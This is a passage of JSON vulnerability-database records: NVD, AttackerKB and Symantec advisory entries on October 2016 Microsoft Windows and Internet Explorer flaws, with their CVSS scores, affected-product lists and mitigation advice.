"cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2016-3298", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3298", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:-:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:10:44", "description": "The kernel-mode drivers in Transaction Manager in Microsoft Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold, 1511, and 1607 allow local users to gain privileges via a crafted application, aka \"Windows Transaction Manager Elevation of Privilege Vulnerability.\"", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-14T02:59:00", "title": "CVE-2016-3341", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3341"], "modified": "2018-10-12T22:12:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*"], "id": "CVE-2016-3341", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3341", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:10:44", "description": "The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold, 1511, and 1607 allow local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability,\" a different vulnerability than CVE-2016-3376, CVE-2016-7185, and CVE-2016-7211.", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-14T02:59:00", "title": "CVE-2016-3266", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3266"], "modified": "2018-10-12T22:12:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2016-3266", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3266", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:10:50", "description": "The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold, 1511, and 1607 allow local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability.\" a different vulnerability than CVE-2016-3266, CVE-2016-3376, and CVE-2016-7211.", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-14T02:59:00", "title": "CVE-2016-7185", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7185"], "modified": "2018-10-12T22:14:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2016-7185", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7185", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:10:45", "description": "Graphics Device Interface (aka GDI or GDI+) in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allows remote attackers to execute arbitrary code via a crafted web site, aka \"Windows Graphics Component RCE Vulnerability.\"", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-14T02:59:00", "title": "CVE-2016-3393", "type": "cve", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3393"], "modified": "2018-10-12T22:12:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2016-3393", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3393", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-22T06:08:49", "bulletinFamily": "info", "cvelist": ["CVE-2016-3298"], "description": "Microsoft Internet Explorer 9 through 11 and the Internet Messaging API in Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allow remote attackers to determine the existence of arbitrary files via a crafted web site, aka \u201cInternet Explorer Information Disclosure Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:21am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-06-05T00:00:00", "published": "2016-10-14T00:00:00", "id": "AKB:3ACBBD0F-FD4A-47AD-B36E-35C7A8EA68AA", "href": "https://attackerkb.com/topics/qGYAAzU2YK/cve-2016-3298", "type": "attackerkb", "title": "CVE-2016-3298", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-11-22T06:09:10", "bulletinFamily": "info", "cvelist": ["CVE-2016-3393"], "description": "Graphics Device Interface (aka GDI or GDI+) in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allows remote attackers to execute arbitrary code via a crafted web site, aka \u201cWindows Graphics Component RCE Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:22am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-06-05T00:00:00", "published": "2016-10-14T00:00:00", "id": "AKB:CCCC3EB7-288A-483C-8127-3BC58A63E83D", "href": "https://attackerkb.com/topics/TbHMc5qj61/cve-2016-3393", "type": "attackerkb", "title": "CVE-2016-3393", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-03-12T06:25:21", "bulletinFamily": "software", "cvelist": ["CVE-2016-7211"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability that occurs in the Windows kernel. A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "SMNTC-93556", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/93556", "type": "symantec", "title": "Microsoft Windows Kernel 'Win32k.sys' CVE-2016-7211 Local Privilege Escalation Vulnerability", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-12T04:24:57", "bulletinFamily": "software", "cvelist": ["CVE-2016-3262"], "description": "### Description\n\nMicrosoft Windows is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Live Meeting 2007 Console \n * Microsoft Lync 2010 (32-bit) \n * Microsoft Lync 2010 (64-bit) \n * Microsoft Lync 2010 Attendee \n * Microsoft Lync 2013 (32-bit) SP1 \n * Microsoft Lync 2013 (64-bit) SP1 \n * Microsoft Lync Basic 2013 (32-bit) SP1 \n * Microsoft Lync Basic 2013 (64-bit) SP1 \n * Microsoft Office 2007 SP3 \n * Microsoft Office 2010 (32-bit edition) SP2 \n * Microsoft Office 2010 (64-bit edition) SP2 \n * Microsoft Skype for Business 2016 (32-bit) \n * Microsoft Skype for Business 2016 (64-bit) \n * Microsoft Skype for Business Basic 2016 (32-bit) \n * Microsoft Skype for Business Basic 2016 (64-bit) \n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition SP2 \n * Microsoft Word Viewer \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity such as unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "SMNTC-93390", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/93390", "type": "symantec", "title": "Microsoft Windows Graphics Component CVE-2016-3262 Information Disclosure Vulnerability", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-12T00:30:34", "bulletinFamily": "software", "cvelist": ["CVE-2016-3263"], "description": "### Description\n\nMicrosoft Windows is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Live Meeting 2007 Console \n * Microsoft Lync 2010 (32-bit) \n * Microsoft Lync 2010 (64-bit) \n * Microsoft Lync 2010 Attendee \n * Microsoft Lync 2013 (32-bit) SP1 \n * Microsoft Lync 2013 (64-bit) SP1 \n * Microsoft Lync Basic 2013 (32-bit) SP1 \n * Microsoft Lync Basic 2013 (64-bit) SP1 \n * Microsoft Office 2007 SP3 \n * Microsoft Office 2010 (32-bit edition) SP2 \n * Microsoft Office 2010 (64-bit edition) SP2 \n * Microsoft Skype for Business 2016 (32-bit) \n * Microsoft Skype for Business 2016 (64-bit) \n * Microsoft Skype for Business Basic 2016 (32-bit) \n * Microsoft Skype for Business Basic 2016 (64-bit) \n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition SP2 \n * Microsoft Word Viewer \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity such as unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "SMNTC-93394", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/93394", "type": "symantec", "title": "Microsoft Windows Graphics Component CVE-2016-3263 Information Disclosure Vulnerability", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-13T12:07:47", "bulletinFamily": "software", "cvelist": ["CVE-2016-3341"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability that occurs in the Windows kernel. A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "SMNTC-93391", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/93391", "type": "symantec", "title": "Microsoft Transaction Manager CVE-2016-3341 Local Privilege Escalation Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:40:06", "bulletinFamily": "software", "cvelist": ["CVE-2016-3298"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to multiple information-disclosure vulnerabilities. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks. Internet explorer 9, 10, and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "SMNTC-93392", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/93392", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2016-3298 Multiple Information Disclosure Vulnerabilities", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-14T10:04:34", "bulletinFamily": "software", "cvelist": ["CVE-2016-3270"], "description": "### Description\n\nMicrosoft Graphics Component is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to gain elevated privileges within the context of the affected system.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition SP2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "SMNTC-93403", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/93403", "type": "symantec", "title": "Microsoft Windows Graphics Component CVE-2016-3270 Local Privilege Escalation Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:40:01", "bulletinFamily": "software", "cvelist": ["CVE-2016-0142"], "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code with elevated privileges. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### 